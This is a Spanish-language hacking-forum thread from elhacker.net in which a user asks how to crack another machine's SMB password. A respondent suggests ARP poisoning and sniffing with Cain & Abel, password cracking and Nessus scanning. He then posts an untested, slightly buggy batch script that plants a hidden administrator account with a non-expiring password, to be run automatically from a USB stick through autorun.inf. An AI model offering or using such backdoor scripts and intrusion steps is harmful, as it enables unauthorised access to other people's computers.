Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: tordek en 24 Septiembre 2010, 04:21 am



Título: Ayuda con el protocolo smb
Publicado por: tordek en 24 Septiembre 2010, 04:21 am
buenas solo keria saber si hay alguna forma de crackear esta contraseña, he investigado y dicen que se puede con cain y abel, algun programa de fuerza bruta,etc.
porfa denme su opinion cual seria la forma mas eficaz de obtener esta contraseña?
de antemano gracias por sus respuestas


Título: Re: Ayuda con el protocolo smb
Publicado por: APOKLIPTICO en 25 Septiembre 2010, 17:58 pm
Lo que podés hacer es con cain & abel hacer arp poisoning y sniffar el tráfico buscando a alguien que se esté conectando al smb, una vez que se haya conectado, lo podés intentar crackear usando fuerza bruta, diccionarios o rainbow tables.


Título: Re: Ayuda con el protocolo smb
Publicado por: tordek en 25 Septiembre 2010, 23:29 pm
no se puede algun exploit o algo por el estilo  :P sino voy a tener que quedarme con cain y abel  :D
gracias


Título: Re: Ayuda con el protocolo smb
Publicado por: APOKLIPTICO en 25 Septiembre 2010, 23:45 pm
Y... Podés tratar con nessus, hacé un escaneo y fijate si encontrás algo... Supongo que debes de tener acceso físico a esta computadora ya que estas en una lan (a menos obviamente q estés en una vpn, en cuyo caso no va a funcionar el método con cain y abel), si tenés acceso físico a esta pc, podés dejarla vulnerable con muchas cosas, desde un troyano, hasta un script que agregue un usuario con un nombre de usuario y una contraseña.
No lo probé, pero debería funcionar:
Este script agrega un usuario llamado "sys" con la contraseña "elhacker", lo agrega al grupo de administradores y luego edita una clave en el registro para ocultarlo de la pantalla de bienvenida, luego, evita que expire la contraseña.

Código
  1. ECHO OFF
  2. CLS
  3. net user sys elhacker /add
  4. net localgroup administradores elhacker /add
  5. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sys /t REG_DWORD /d 0
  6. wmic path win32_useraccount where name='sys' set passwordexpires=false
  7.  

Eso lo metés en un pendrive, luego modificas el autorun.inf para que se ejecute automáticamente y listo...
Lo único q tenes que hacer, es cuando esté prendida esta pc, enchufas el pendrive y listo.